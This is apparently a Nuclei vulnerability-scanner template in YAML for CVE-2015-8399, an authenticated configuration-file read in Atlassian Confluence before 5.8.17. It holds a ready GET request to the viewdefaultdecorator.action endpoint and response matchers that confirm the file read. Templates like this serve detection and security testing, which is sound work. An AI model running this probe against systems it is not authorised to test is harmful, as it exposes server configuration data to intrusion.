26 lines
826 B
YAML
26 lines
826 B
YAML
id: CVE-2015-8399
|
|
info:
|
|
author: princechaddha
|
|
name: Atlassian Confluence configuration files read
|
|
severity: medium
|
|
description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
|
|
reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
|
|
tags: cve,cve2015,atlassian,confluence
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "confluence-init.properties"
|
|
- "View Default Decorator"
|
|
condition: and
|
|
part: body
|